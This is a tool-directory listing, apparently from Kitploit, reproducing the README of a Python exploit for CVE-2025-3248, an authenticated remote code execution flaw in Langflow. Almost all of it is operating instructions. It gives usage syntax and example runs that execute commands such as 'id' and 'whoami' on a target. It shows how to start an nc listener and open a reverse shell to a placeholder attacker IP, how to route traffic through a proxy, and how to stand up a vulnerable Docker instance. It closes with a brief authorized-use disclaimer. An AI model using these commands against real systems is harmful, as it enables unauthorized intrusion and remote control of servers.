Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
RCE-CVE-2025-3248 — This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit. | Kitploit
Tools/GitHubGitHub/tiemio/rce-cve-2025-3248
ExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access ToolPayload Development
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit.

View Repository
111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Authenticated CVE-2025-3248 Langflow Remote Code Execution

This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit.


Features

  • Authenticated Command Execution: Run arbitrary system commands on the target.
  • Reverse Shell: Spawn a reverse shell to your listener.
  • Proxy Support: Route requests through a proxy (e.g., Burp Suite).

Requirements

  • Python 3.x
  • requests library

Install dependencies with:

root@kitploit:~
pip install requests

Usage

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

Arguments

ArgumentDescriptionRequired
-u, --urlTarget base URL (e.g., https://target.com)Yes
-l, --loginAdmin usernameYes
-p, --passwordAdmin passwordYes
-c, --commandCommand to execute on the targetNo*
--proxyProxy URL (e.g., http://127.0.0.1:8080)No
--lhostLocal host for reverse shellNo*
--lportLocal port for reverse shellNo*

* You must specify either a command (-c) or both --lhost and --lport for a reverse shell.


Examples

1. Execute a Command

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. Get a Reverse Shell

Start a listener on your machine:

root@kitploit:~
nc -lvnp 4444

Then run:

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. Use a Proxy

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Docker image

Deploying the image

You can deploy the Docker image using the following command:

root@kitploit:~
podman compose up -d

The image will be available at http://localhost:7860. Credits for the compose file: This repository


Disclaimer

This script is for educational and authorized penetration testing purposes only. Do not use against systems you do not own or have explicit permission to test.


This readme is AI generated.

Download Tool